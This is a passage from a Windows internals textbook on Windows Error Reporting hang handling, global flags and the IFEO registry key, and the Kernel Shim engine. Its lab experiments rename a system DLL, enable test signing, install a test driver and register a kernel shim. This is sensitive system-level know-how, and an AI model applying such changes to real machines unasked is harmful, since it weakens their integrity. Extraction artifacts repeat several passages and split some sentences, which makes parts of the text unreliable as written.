The first contains a basic description of the system, including the operating system version,
a list of drivers installed on the machine, and the list of devices present in the system.
I
The second contains metadata used by the OCA service, including the event type that triggered
WER and additional configuration information, such as the system manufacturer.
WerFault then sends a copy of the two XML files and the minidump to Microsoft OCA server, which
forwards the data to a server farm for automated analysis. The server farm’s automated analysis uses
the same analysis engine that the Microsoft kernel debuggers use when you load a crash dump file into
them. The analysis generates a bucket ID, which is a signature that identifies a particular crash type.
Process hang detection
Windows Error reporting is also used when an application hangs and stops work because of some
defect or bug in its code. An immediate effect of an application hanging is that it would not react to
any user interaction. The algorithm used for detecting a hanging application depends on the applica-
tion type: the Modern application stack detects that a Centennial or UWP application is hung when
a request sent from the HAM (Host Activity Manager) is not processed after a well-defined timeout
(usually 30 seconds); the Task manager detects a hung application when an application does not reply
552
CHAPTER 10 Management, diagnostics, and tracing
to the WM_QUIT message; Win32 desktop applications are considered not responding and hung when
a foreground window stops to process GDI messages for more than 5 seconds.
Describing all the hung detection algorithms is outside the scope of this book. Instead, we will con-
sider the most likely case of a classical Win32 desktop application that stopped to respond to any user
input. The detection starts in the Win32k kernel driver, which, after the 5-second timeout, sends a mes-
sage to the DwmApiPort ALPC port created by the Desktop Windows Manager (DWM.exe). The DWM
processes the message using a complex algorithm that ends up creating a “ghost” window on top of the
hanging window. The ghost redraws the window’s original content, blurring it out and adding the (Not
Responding) string in the title. The ghost window processes GDI messages through an internal message
pump routine, which intercepts the close, exit, and activate messages by calling the ReportHang routine
exported by the Windows User Mode Crash Reporting DLL (faultrep.dll). The ReportHang function simply
builds a WERSVC_REPORT_HANG message and sends it to the WER service to wait for a reply.
The WER service processes the message and initializes the Hang reporting by reading settings values
from the HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs root registry key. In par-
ticular, the MaxHangrepInstances value is used to indicate how many hanging reports can be generated
in the same time (the default number is eight if the value does not exist), while the TerminationTimeout
value specifies the time that needs to pass after WER has tried to terminate the hanging process before
considering the entire system to be in hanging situation (10 seconds by default). This situation can happen
for various reasons—for example, an application has an active pending IRP that is never completed by
a kernel driver. The WER service opens the hanging process and obtains its token, and some other basic
information. It then creates a shared memory section object to store them (similar to user application
crashes; in this case, the shared section has a name: Global\<Random GUID>).
A WerFault process is spawned in a suspended state using the faulting process’s token and the -h
command-line switch (which is used to specify to generate a report for a hanging process). Unlike
with user application crashes, a snapshot of the hanging process is taken from the WER service using
a full SYSTEM token by invoking the the PssNtCaptureSnapshot API exported in Ntdll. The snapshot’s
handle is duplicated in the suspended WerFault process, which is resumed after the snapshot has been
successfully acquired. When the WerFault starts, it signals an event indicating that the report genera-
tion has started. From this stage, the original process can be terminated. Information for the report is
grabbed from the cloned process.
The report for a hanging process is similar to the one acquired for a crashing process: The WerFault
process starts by querying the value of the Debugger registry value located in the global HKLM\
Software\Microsoft\Windows\Windows Error Reporting\Hangs root registry key. If there is a valid
debugger, it is launched and attached to the original hanging process. In case the Disable registry value
is set to 1, the procedure is aborted and the WerFault process exits without generating any report.
Otherwise, WerFault opens the shared memory section, validates it, and grabs all the information
previously saved by the WER service. The report is initialized by using the WerReportCreate func-
tion exported in WER.dll and used also for crashing processes. The dialog box for a hanging process
(shown in Figure 10-44) is always displayed independently on the WER configuration. Finally, the
WerReportSubmit function (exported in WER.dll) is used to generate all the files for the report (includ-
ing the minidump file) similarly to user applications crashes (see the “Crash report generation” section
earlier in this chapter). The report is finally sent to the Online Crash Analysis server.
CHAPTER 10 Management, diagnostics, and tracing
553
FIGURE 10-44 The Windows Error Reporting dialog box for hanging applications.
After the report generation is started and the WERSVC_HANG_REPORTING_STARTED message
is returned to DWM, WER kills the hanging process using the TerminateProcess API. If the process
is not terminated in an expected time frame (generally 10 seconds, but customizable through the
TerminationTimeout setting as explained earlier), the WER service relaunches another WerFault instance
running under a full SYSTEM token and waits another longer timeout (usually 60 seconds but custom-
izable through the LongTerminationTimeout setting). If the process is not terminated even by the end
of the longer timeout, WER has no other chances than to write an ETW event on the Application event
log, reporting the impossibility to terminate the process. The ETW event is shown in Figure 10-45.
Note that the event description is misleading because WER hasn’t been able to terminate the hanging
application.
FIGURE 10-45 ETW error event written to the Application log for a nonterminating hanging application.
554
CHAPTER 10 Management, diagnostics, and tracing
Global flags
Windows has a set of flags stored in two systemwide global variables named NtGlobalFlag and
NtGlobalFlag2 that enable various internal debugging, tracing, and validation support in the
operating system. The two system variables are initialized from the registry key HKLM\SYSTEM\
CurrentControlSet\Control\Session Manager in the values GlobalFlag and GlobalFlag2 at system boot
time (phase 0 of the NT kernel initialization). By default, both registry values are 0, so it’s likely that
on your systems, you’re not using any global flags. In addition, each image has a set of global flags
that also turn on internal tracing and validation code (although the bit layout of these flags is slightly
different from the systemwide global flags).
Fortunately, the debugging tools contain a utility named Gflags.exe that you can use to view and
change the system global flags (either in the registry or in the running system) as well as image global
flags. Gflags has both a command-line and a GUI interface. To see the command-line flags, type
gflags /?. If you run the utility without any switches, the dialog box shown in Figure 10-46 is displayed.
FIGURE 10-46 Setting system debugging options with GFlags.
CHAPTER 10 Management, diagnostics, and tracing
555
Flags belonging to the Windows Global flags variables can be split in different categories:
I
Kernel flags are processed directly by various components of the NT kernel (the heap manager,
exceptions, interrupts handlers, and so on).
I
User flags are processed by components running in user-mode applications (usually Ntdll).
I
Boot-only flags are processed only when the system is starting.
I
Per-image file global flags (which have a slightly different meaning than the others) are pro-
cessed by the loader, WER, and some other user-mode components, depending on the user-
mode process context in which they are running.
The names of the group pages shown by the GFlags tool is a little misleading. Kernel, boot-only, and
user flags are mixed together in each page. The main difference is that the System Registry page allows
the user to set global flags on the GlobalFlag and GlobalFlag2 registry values, parsed at system boot time.
This implies that eventual new flags will be enabled only after the system is rebooted. The Kernel Flags
page, despite its name, does not allow kernel flags to be applied on the fly to a live system. Only certain
user-mode flags can be set or removed (the enable page heap flag is a good example) without requiring
a system reboot: the Gflags tool sets those flags using the NtSetSystemInformation native API (with the
SystemFlagsInformation information class). Only user-mode flags can be set in that way.
EXPERIMENT: Viewing and setting global flags
You can use the !gflag kernel debugger command to view and set the state of the NtGlobalFlag
kernel variable. The !gflag command lists all the flags that are enabled. You can use !gflag -? to
get the entire list of supported global flags. At the time of this writing, the !gflag extension has
not been updated to display the content of the NtGlobalFlag2 variable.
The Image File page requires you to fill in the file name of an executable image. Use this option
to change a set of global flags that apply to an individual image (rather than to the whole system).
The page is shown in Figure 10-47. Notice that the flags are different from the operating system ones
shown in Figure 10-46. Most of the flags and the setting available in the Image File and Silent Process
Exit pages are applied by storing new values in a subkey with the same name as the image file (that is,
notepad.exe for the case shown in Figure 10-47) under the HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options registry key (also known as the IFEO key). In particular,
the GlobalFlag (and GlobalFlag2) value represents a bitmask of all the available per-image global flags.
EXPERIMENT: Viewing and setting global flags
You can use the !gflag kernel debugger command to view and set the state of the NtGlobalFlag
kernel variable. The !gflag command lists all the flags that are enabled. You can use !gflag -? to
get the entire list of supported global flags. At the time of this writing, the !gflag extension has
not been updated to display the content of the NtGlobalFlag2 variable.
556
CHAPTER 10 Management, diagnostics, and tracing
FIGURE 10-47 Setting per-image global flags with GFlags.
When the loader initializes a new process previously created and loads all the dependent librar-
ies of the main base executable (see Chapter 3 of Part 1 for more details about the birth of a process),
the system processes the per-image global flags. The LdrpInitializeExecutionOptions internal function
opens the IFEO key based on the name of the base image and parses all the per-image settings and
flags. In particular, after the per-image global flags are retrieved from the registry, they are stored in
the NtGlobalFlag (and NtGlobalFlag2) field of the process PEB. In this way, they can be easily accessed
by any image mapped in the process (including Ntdll).
Most of the available global flags are documented at https://docs.microsoft.com/en-us/
windows-hardware/drivers/debugger/gflags-flag-table.
EXPERIMENT: Troubleshooting Windows loader issues
In the “Watching the image loader” experiment in Chapter 3 of Part 1, you used the GFlags tool
to display the Windows loader runtime information. That information can be useful for under-
standing why an application does not start at all (without returning any useful error informa-
tion). You can retry the same experiment on mspaint.exe by renaming the Msftedit.dll file (the
Rich Text Edit Control library) located in %SystemRoot%\system32. Indeed, Paint depends on
that DLL indirectly. The Msftedit library is loaded dynamically by MSCTF.dll. (It is not statically
EXPERIMENT: Troubleshooting Windows loader issues
In the “Watching the image loader” experiment in Chapter 3 of Part 1, you used the GFlags tool
to display the Windows loader runtime information. That information can be useful for under-
standing why an application does not start at all (without returning any useful error informa-
tion). You can retry the same experiment on mspaint.exe by renaming the Msftedit.dll file (the
Rich Text Edit Control library) located in %SystemRoot%\system32. Indeed, Paint depends on
that DLL indirectly. The Msftedit library is loaded dynamically by MSCTF.dll. (It is not statically
CHAPTER 10 Management, diagnostics, and tracing
557
linked in the Paint executable.) Open an administrative command prompt window and type the
following commands:
cd /d c:\windows\system32
takeown /f msftedit.dll
icacls msftedit.dll /grant Administrators:F
ren msftedit.dll msftedit.disabled
Then enable the loader snaps using the Gflags tool, as specified in the “Watching the image
loader” experiment. If you start mspaint.exe using Windbg, the loader snaps would be able to
highlight the problem almost immediately, returning the following text:
142c:1e18 @ 00056578 - LdrpInitializeNode - INFO: Calling init routine 00007FFC79258820 for
DLL "C:\Windows\System32\MSCTF.dll"142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL
name: .\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name: C:\Program Files\Debugging Tools
for Windows (x64)\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name: C:\Windows\system32\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
. . .
C:\Users\test\AppData\Local\Microsoft\WindowsApps\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpSearchPath - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpProcessWork - ERROR: Unable to load DLL: "MSFTEDIT.DLL", Parent
Module: "(null)", Status: 0xc0000135
142c:133c @ 00229625 - LdrpLoadDllInternal - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrLoadDll - RETURN: Status: 0xc0000135
Kernel shims
New releases of the Windows operating system can sometime bring issues with old drivers, which
can have difficulties in operating in the new environment, producing system hangs or blue screens of
death. To overcome the problem, Windows 8.1 introduced a Kernel Shim engine that’s able to dynami-
cally modify old drivers, which can continue to run in the new OS release. The Kernel Shim engine is
implemented mainly in the NT kernel. Driver’s shims are registered through the Windows Registry and
the Shim Database file. Drivers’ shims are provided by shim drivers. A shim driver uses the exported
KseRegisterShimEx API to register a shim that can be applied to target drivers that need it. The Kernel
Shim engine supports mainly two kinds of shims applied to devices or drivers.
Shim engine initialization
In early OS boot stages, the Windows Loader, while loading all the boot-loaded drivers, reads and
maps the driver compatibility database file, located in %SystemRoot%\apppatch\Drvmain.sdb (and, if
it exists, also in the Drvpatch.sdb file). In phase 1 of the NT kernel initialization, the I/O manager starts
the two phases of the Kernel Shim engine initialization. The NT kernel copies the binary content of
linked in the Paint executable.) Open an administrative command prompt window and type the
following commands:
cd /d c:\windows\system32
takeown /f msftedit.dll
icacls msftedit.dll /grant Administrators:F
ren msftedit.dll msftedit.disabled
Then enable the loader snaps using the Gflags tool, as specified in the “Watching the image
loader” experiment. If you start mspaint.exe using Windbg, the loader snaps would be able to
highlight the problem almost immediately, returning the following text:
142c:1e18 @ 00056578 - LdrpInitializeNode - INFO: Calling init routine 00007FFC79258820 for
DLL "C:\Windows\System32\MSCTF.dll"142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL
name: .\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name: C:\Program Files\Debugging Tools
for Windows (x64)\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name: C:\Windows\system32\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
. . .
C:\Users\test\AppData\Local\Microsoft\WindowsApps\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpSearchPath - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpProcessWork - ERROR: Unable to load DLL: "MSFTEDIT.DLL", Parent
Module: "(null)", Status: 0xc0000135
142c:133c @ 00229625 - LdrpLoadDllInternal - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrLoadDll - RETURN: Status: 0xc0000135
558
CHAPTER 10 Management, diagnostics, and tracing
the database file(s) in a global buffer allocated from the paged pool (pointed by the internal global
KsepShimDb variable). It then checks whether Kernel Shims are globally disabled. In case the system
has booted in Safe or WinPE mode, or in case Driver verifier is enabled, the shim engine wouldn’t
be enabled. The Kernel Shim engine is controllable also using system policies or through the HKLM\
System\CurrentControlSet\Control\Compatibility\DisableFlags registry value. The NT kernel then gath-
ers low-level system information needed when applying device shims, like the BIOS information and
OEM ID, by checking the System Fixed ACPI Descriptor Table (FADT). The shim engine registers the first
built-in shim provider, named DriverScope, using the KseRegisterShimEx API. Built-in shims provided by
Windows are listed in Table 10-21. Some of them are indeed implemented in the NT kernel directly and
not in any external driver. DriverScope is the only shim registered in phase 0.
TABLE 10-21 Windows built-in kernel shims
Shim Name
GUID
Purpose
Module
DriverScope
{BC04AB45-EA7E-4A11-A7BB-
977615F4CAAE}
The driver scope shim is used to collect
health ETW events for a target driver. Its
hooks do nothing other than writing an
ETW event before or after calling the origi-
nal nonshimmed callbacks.
NT kernel
Version Lie
{3E28B2D1-E633-408C-8E9B-
2AFA6F47FCC3} (7.1)
(47712F55-BD93-43FC-9248-
B9A83710066E} (8)
{21C4FB58-D477-4839-A7EA-
AD6918FBC518} (8.1)
The version lie shim is available for
Windows 7, 8, and 8.1. The shim commu-
nicates a previous version of the OS when
required by a driver in which it is applied.
NT kernel
SkipDriverUnload
{3E8C2CA6-34E2-4DE6-8A1E-
9692DD3E316B}
The shim replaces the driver’s unload
routine with one that doesn’t do anything
except logging an ETW event.
NT kernel
ZeroPool
{6B847429-C430-4682-B55F-
FD11A7B55465}
Replace the ExAllocatePool API with a
function that allocates the pool memory
and zeroes it out.
NT kernel
ClearPCIDBits
{B4678DFF-BD3E-46C9-
923B-B5733483B0B3}
Clear the PCID bits when some antivirus
drivers are mapping physical memory
referred by CR3.
NT kernel
Kaspersky
{B4678DFF-CC3E-46C9-
923B-B5733483B0B3}
Shim created for specific Kaspersky filter
drivers for masking the real value of the
UseVtHardware registry value, which could
have caused bug checks on old versions of
the antivirus.
NT kernel
Memcpy
{8A2517C1-35D6-4CA8-9EC8-
98A12762891B}
Provides a safer (but slower) memory copy
implementation that always zeroes out the
destination buffer and can be used with
device memory.
NT kernel
KernelPadSectionsOverride
{4F55C0DB-73D3-43F2-9723-
8A9C7F79D39D}
Prevents discardable sections of any
kernel module to be freed by the memory
manager and blocks the loading of the
target driver (where the shim is applied).
NT kernel
NDIS Shim
{49691313-1362-4e75-8c2a-
2dd72928eba5}
NDIS version compatibility shim (returns
6.40 where applied to a driver).
Ndis.sys
SrbShim
{434ABAFD-08FA-4c3d-
A88D-D09A88E2AB17}
SCSI Request Block compatibility shim that
intercepts the IOCTL_STORAGE_QUERY_
PROPERTY.
Storport.sys
CHAPTER 10 Management, diagnostics, and tracing
559
Shim Name
GUID
Purpose
Module
DeviceIdShim
{0332ec62-865a-4a39-b48f-
cda6e855f423}
Compatibility shim for RAID devices.
Storport.sys
ATADeviceIdShim
{26665d57-2158-4e4b-a959-
c917d03a0d7e}
Compatibility shim for serial ATA devices.
Storport.sys
Bluetooth Filter Power shim
{6AD90DAD-C144-4E9D-
A0CF-AE9FCB901EBD}
Compatibility shim for Bluetooth filter
drivers.
Bthport.sys
UsbShim
{fd8fd62e-4d94-4fc7-8a68-
bff7865a706b}
Compatibility shim for old Conexant USB
modem.
Usbd.sys
Nokia Usbser Filter Shim
{7DD60997-651F-4ECB-B893-
BEC8050F3BD7}
Compatibility shim for Nokia Usbser filter
drivers (used by Nokia PC Suite).
Usbd.sys
A shim is internally represented through the KSE_SHIM data structure (where KSE stands for Kernel
Shim Engine). The data structure includes the GUID, the human-readable name of the shim, and an
array of hook collection (KSE_HOOK_COLLECTION data structures). Driver shims support different
kinds of hooks: hooks on functions exported by the NT kernel, HAL, and by driver libraries, and on
driver’s object callback functions. In phase 1 of its initialization, the Shim Engine registers the Microsoft-
Windows-Kernel-ShimEngine ETW provider (which has the {0bf2fb94-7b60-4b4d-9766-e82f658df540}
GUID), opens the driver shim database, and initializes the remaining built-in shims implemented in the
NT kernel (refer to Table 10-21).
To register a shim (through KseRegisterShimEx), the NT kernel performs some initial integrity checks
on both the KSE_SHIM data structure, and each hook in the collection (all the hooks must reside in the
address space of the calling driver). It then allocates and fills a KSE_REGISTERED_SHIM_ENTRY data
structure which, as the name implies, represents the registered shim. It contains a reference counter
and a pointer back to the driver object (used only in case the shim is not implemented in the NT kernel).
The allocated data structure is linked in a global linked list, which keeps track of all the registered shims
in the system.
The shim database
The shim database (SDB) file format was first introduced in the old Windows XP for Application
Compatibility. The initial goal of the file format was to store a binary XML-style database of programs
and drivers that needed some sort of help from the operating system to work correctly. The SDB file
has been adapted to include kernel-mode shims. The file format describes an XML database using tags.
A tag is a 2-byte basic data structure used as unique identifier for entries and attributes in the data-
base. It is made of a 4-bit type, which identifies the format of the data associated with the tag, and a
12-bit index. Each tag indicates the data type, size, and interpretation that follows the tag itself. An SDB
file has a 12-byte header and a set of tags. The set of tags usually defines three main blocks in the shim
database file:
I
The INDEX block contains index tags that serve to fast-index elements in the database. Indexes
in the INDEX block are stored in increasing order. Therefore, searching an element in the index-
es is a fast operation (using a binary search algorithm). For the Kernel Shim engine, the elements
are stored in the INDEXES block using an 8-byte key derived from the shim name.
560
CHAPTER 10 Management, diagnostics, and tracing
I
The DATABASE block contains top-level tags describing shims, drivers, devices, and executables.
Each top-level tag contains children tags describing properties or inner blocks belonging to the
root entity.
I
The STRING TABLE block contains strings that are referenced by lower-level tags in the
DATABASE block. Tags in the DATABASE block usually do not directly describe a string but
instead contain a reference to a tag (called STRINGREF) describing a string located in the string
table. This allows databases that contain a lot of common strings to be small in size.
Microsoft has partially documented the SDB file format and the APIs used to read and write it at
https://docs.microsoft.com/en-us/windows/win32/devnotes/application-compatibility-database. All the
SDB APIs are implemented in the Application Compatibility Client Library (apphelp.dll).
Driver shims
The NT memory manager decides whether to apply a shim to a kernel driver at its loading time, using
the KseDriverLoadImage function (boot-loaded drivers are processed by the I/O manager, as discussed
in Chapter 12). The routine is called at the correct time of a kernel-module life cycle, before either
Driver Verifier, Import Optimization, or Kernel Patch protection are applied to it. (This is important;
otherwise, the system would bugcheck.) A list of the current shimmed kernel modules is stored in a
global variable. The KsepGetShimsForDriver routine checks whether a module in the list with the same
base address as the one being loaded is currently present. If so, it means that the target module has
already been shimmed, so the procedure is aborted. Otherwise, to determine whether the new module
should be shimmed, the routine checks two different sources:
I
Queries the “Shims” multistring value from a registry key named as the module being loaded
and located in the HKLM\System\CurrentControlSet\Control\Compatibility\Driver root key. The
registry value contains an array of shims’ names that would be applied to the target module.
I
In case the registry value for a target module does not exist, parses the driver compatibility da-
tabase file, looking for a KDRIVER tag (indexed by the INDEX block), which has the same name
as the module being loaded. If a driver is found in the SDB file, the NT kernel performs a com-
parison of the driver version (TAG_SOURCE_OS stored in the KDRIVER root tag), file name, and
path (if the relative tags exist in the SDB), and of the low-level system information gathered at
engine initialization time (to determine if the driver is compatible with the system). In case any
of the information does not match, the driver is skipped, and no shims are applied. Otherwise,
the shim names list is grabbed from the KSHIM_REF lower-level tags (which is part of the root
KDRIVER). The tags are reference to the KSHIMs located in the SDB database block.
If one of the two sources yields one or more shims names to be applied to the target driver, the SDB
file is parsed again with the goal to validate that a valid KSHIM descriptor exists. If there are no tags
related to the specified shim name (which means that no shim descriptor exists in the database), the
procedure is interrupted (this prevents an administrator from applying random non-Microsoft shims to
a driver). Otherwise, an array of KSE_SHIM_INFO data structure is returned to KsepGetShimsForDriver.
CHAPTER 10 Management, diagnostics, and tracing
561
The next step is to determine if the shims described by their descriptors have been registered in the
system. To do this, the Shim engine searches into the global linked list of registered shims (filled every
time a new shim is registered, as explained previously in the “Shim Engine initialization” section). If a
shim is not registered, the shim engine tries to load the driver that provides it (its name is stored in the
MODULE child tag of the root KSHIM entry) and tries again. When a shim is applied for the first time,
the Shim engine resolves the pointers of all the hooks described by the KSE_HOOK_COLLECTION data
structures’ array belonging to the registered shim (KSE_SHIM data structure). The shim engine allocates
and fills a KSE_SHIMMED_MODULE data structure representing the target module to be shimmed
(which includes the base address) and adds it to the global list checked in the beginning.
At this stage, the shim engine applies the shim to the target module using the internal
KsepApplyShimsToDriver routine. The latter cycles between each hook described by the KSE_HOOK_
COLLECTION array and patches the import address table (IAT) of the target module, replacing the
original address of the hooked functions with the new ones (described by the hook collection). Note
that the driver’s object callback functions (IRP handlers) are not processed at this stage. They are modi-
fied later by the I/O manager before the DriverInit routine of the target driver is called. The original
driver’s IRP callback routines are saved in the Driver Extension of the target driver. In that way, the
hooked functions have a simple way to call back into the original ones when needed.
EXPERIMENT: Witnessing kernel shims
While the official Microsoft Application Compatibility Toolkit distributed with the Windows
Assessment and Deployment Kit allows you to open, modify, and create shim database files, it
does not work with system database files (identified through to their internal GUIDs), so it won’t
be able to parse all the kernel shims that are described by the drvmain.sdb database. Multiple
third-party SDB parsers exist. One in particular, called SDB explorer, is freely downloadable from
https://ericzimmerman.github.io/.
In this experiment, you get a peek at the drvmain system database file and apply a kernel shim
to a test driver, ShimDriver, which is available in this book’s downloadable resources. For this experi-
ment, you need to enable test signing (the ShimDriver is signed with a test self-signed certificate):
1.
Open an administrative command prompt and type the following command:
bcdedit /set testsigning on
2.
Restart your computer, download SDB Explorer from its website, run it, and open the
drvmain.sdb database located in %SystemRoot%\apppatch.
3.
From the SDB Explorer main window, you can explore the entire database file, orga-
nized in three main blocks: Indexes, Databases, and String table. Expand the DATABASES
root block and scroll down until you can see the list of KSHIMs (they should be located
after the KDEVICEs). You should see a window similar to the following:
EXPERIMENT: Witnessing kernel shims
While the official Microsoft Application Compatibility Toolkit distributed with the Windows
Assessment and Deployment Kit allows you to open, modify, and create shim database files, it
does not work with system database files (identified through to their internal GUIDs), so it won’t
be able to parse all the kernel shims that are described by the drvmain.sdb database. Multiple
third-party SDB parsers exist. One in particular, called SDB explorer, is freely downloadable from
https://ericzimmerman.github.io/
https://ericzimmerman.github.io/.
https://ericzimmerman.github.io/
In this experiment, you get a peek at the drvmain system database file and apply a kernel shim
to a test driver, ShimDriver, which is available in this book’s downloadable resources. For this experi-
ment, you need to enable test signing (the ShimDriver is signed with a test self-signed certificate):
1.
Open an administrative command prompt and type the following command:
bcdedit /set testsigning on
2.
Restart your computer, download SDB Explorer from its website, run it, and open the
drvmain.sdb database located in %SystemRoot%\apppatch.
3.
From the SDB Explorer main window, you can explore the entire database file, orga-
nized in three main blocks: Indexes, Databases, and String table. Expand the DATABASES
root block and scroll down until you can see the list of KSHIMs (they should be located
after the KDEVICEs). You should see a window similar to the following:
562
CHAPTER 10 Management, diagnostics, and tracing
4.
You will apply one of the Version lie shims to our test driver. First, you should copy the
ShimDriver to the %SystemRoot%\System32\Drivers. Then you should install it by typ-
ing the following command in the administrative command prompt (it is assumed that
your system is 64-bit):
sc create ShimDriver type= kernel start= demand error= normal binPath= c:\
Windows\System32\ShimDriver64.sys
5.
Before starting the test driver, you should download and run the DebugView tool,
available in the Sysinternals website (https://docs.microsoft.com/en-us/sysinternals/
downloads/debugview). This is necessary because ShimDriver prints some debug messages.
6.
Start the ShimDriver with the following command:
sc start shimdriver
7.
Check the output of the DebugView tool. You should see messages like the one shown
in the following figure. What you see depends on the Windows version in which you run
the driver. In the example, we run the driver on an insider release version of Windows
Server 2022:
4.
You will apply one of the Version lie shims to our test driver. First, you should copy the
ShimDriver to the %SystemRoot%\System32\Drivers. Then you should install it by typ-
ing the following command in the administrative command prompt (it is assumed that
your system is 64-bit):
sc create ShimDriver type= kernel start= demand error= normal binPath= c:\
Windows\System32\ShimDriver64.sys
5.
Before starting the test driver, you should download and run the DebugView tool,
available in the Sysinternals website (https://docs.microsoft.com/en-us/sysinternals/
downloads/debugview). This is necessary because ShimDriver prints some debug messages.
downloads/debugview). This is necessary because ShimDriver prints some debug messages.
downloads/debugview
6.
Start the ShimDriver with the following command:
sc start shimdriver
7.
Check the output of the DebugView tool. You should see messages like the one shown
in the following figure. What you see depends on the Windows version in which you run
the driver. In the example, we run the driver on an insider release version of Windows
Server 2022:
CHAPTER 10 Management, diagnostics, and tracing
563
8.
Now you should stop the driver and enable one of the shims present in the SDB data-
base. In this example, you will start with one of the version lie shims. Stop the target
driver and install the shim using the following commands (where ShimDriver64.sys is
the driver’s file name installed with the previous step):
sc stop shimdriver
reg add "HKLM\System\CurrentControlSet\Control\Compatibility\Driver\
ShimDriver64.sys" /v Shims /t REG_MULTI_SZ /d
KmWin81VersionLie /f /reg:64
9.
The last command adds the Windows 8.1 version lie shim, but you can freely choose
other versions.
10. Now, if you restart the driver, you will see different messages printed by the DebugView
tool, as shown in the following figure:
11. This is because the shim engine has correctly applied the hooks on the NT APIs used for
retrieving OS version information (the driver is able to detect the shim, too). You should
be able to repeat the experiment using other shims, like the SkipDriverUnload or the
KernelPadSectionsOverride, which will zero out the driver unload routine or prevent the
target driver from loading, as shown in the following figure:
8.
Now you should stop the driver and enable one of the shims present in the SDB data-
base. In this example, you will start with one of the version lie shims. Stop the target
driver and install the shim using the following commands (where ShimDriver64.sys is
the driver’s file name installed with the previous step):
sc stop shimdriver
reg add "HKLM\System\CurrentControlSet\Control\Compatibility\Driver\
ShimDriver64.sys" /v Shims /t REG_MULTI_SZ /d
KmWin81VersionLie /f /reg:64
9.
The last command adds the Windows 8.1 version lie shim, but you can freely choose
other versions.
10. Now, if you restart the driver, you will see different messages printed by the DebugView
tool, as shown in the following figure:
11. This is because the shim engine has correctly applied the hooks on the NT APIs used for
retrieving OS version information (the driver is able to detect the shim, too). You should
be able to repeat the experiment using other shims, like the SkipDriverUnload or the
KernelPadSectionsOverride, which will zero out the driver unload routine or prevent the
target driver from loading, as shown in the following figure:
564
CHAPTER 10 Management, diagnostics, and tracing
Device shims
Unlike Driver shims, shims applied to Device objects are loaded and applied on demand. The NT kernel
exports the KseQueryDeviceData function, which allows drivers to check whether a shim needs to be
applied to a device object. (Note also that the KseQueryDeviceFlags function is exported. The API is just
a subset of the first one, though.) Querying for device shims is also possible for user-mode applications
through the NtQuerySystemInformation API used with the SystemDeviceDataInformation information
class. Device shims are always stored in three different locations, consulted in the following order:
1.
In the HKLM\System\CurrentControlSet\Control\Compatibility\Device root registry key, using
a key named as the PNP hardware ID of the device, replacing the \ character with a ! (with the
goal to not confuse the registry). Values in the device key specify the device’s shimmed data
being queried (usually flags for a certain device class).
2.
In the kernel shim cache. The Kernel Shim engine implements a shim cache (exposed through
the KSE_CACHE data structure) with the goal of speeding up searches for device flags and data.
3.
In the Shim database file, using the KDEVICE root tag. The root tag, among many others (like
device description, manufacturer name, GUID and so on), includes the child NAME tag contain-
ing a string composed as follows: <DataName:HardwareID>. The KFLAG or KDATA children tags
include the value for the device’s shimmed data.
If the device shim is not present in the cache but just in the SDB file, it is always added. In that way,
future interrogation would be faster and will not require any access to the Shim database file.
Conclusion
In this chapter, we have described the most important features of the Windows operating system
that provide management facilities, like the Windows Registry, user-mode services, task scheduling,
UBPM, and Windows Management Instrumentation (WMI). Furthermore, we have discussed how Event
Tracing for Windows (ETW), DTrace, Windows Error Reporting (WER), and Global Flags (GFlags) provide
the services that allow users to better trace and diagnose issues arising from any component of the
OS or user-mode applications. The chapter concluded with a peek at the Kernel Shim engine, which
helps the system apply compatibility strategies and correctly execute old components that have been
designed for older versions of the operating system.
The next chapter delves into the different file systems available in Windows and with the global
caching available for speeding up file and data access.
565
C H A P T E R 1 1
Caching and file systems
T
he cache manager is a set of kernel-mode functions and system threads that cooperate with the
memory manager to provide data caching for all Windows file system drivers (both local and
network). In this chapter, we explain how the cache manager, including its key internal data structures
and functions, works; how it is sized at system initialization time; how it interacts with other elements
of the operating system; and how you can observe its activity through performance counters. We also
describe the five flags on the Windows CreateFile function that affect file caching and DAX volumes,
which are memory-mapped disks that bypass the cache manager for certain types of I/O.
The services exposed by the cache manager are used by all the Windows File System drivers, which
cooperate strictly with the former to be able to manage disk I/O as fast as possible. We describe the dif-
ferent file systems supported by Windows, in particular with a deep analysis of NTFS and ReFS (the two
most used file systems). We present their internal architecture and basic operations, including how they
interact with other system components, such as the memory manager and the cache manager.
The chapter concludes with an overview of Storage Spaces, the new storage solution designed to
replace dynamic disks. Spaces can create tiered and thinly provisioned virtual disks, providing features
that can be leveraged by the file system that resides at the top.
Terminology
To fully understand this chapter, you need to be familiar with some basic terminology:
I
Disks are physical storage devices such as a hard disk, CD-ROM, DVD, Blu-ray, solid-state disk
(SSD), Non-volatile Memory disk (NVMe), or flash drive.
I
Sectors are hardware-addressable blocks on a storage medium. Sector sizes are determined
by hardware. Most hard disk sectors are 4,096 or 512 bytes, DVD-ROM and Blu-ray sectors are
typically 2,048 bytes. Thus, if the sector size is 4,096 bytes and the operating system wants to
modify the 5120th byte on a disk, it must write a 4,096-byte block of data to the second sector
on the disk.
I
Partitions are collections of contiguous sectors on a disk. A partition table or other disk-
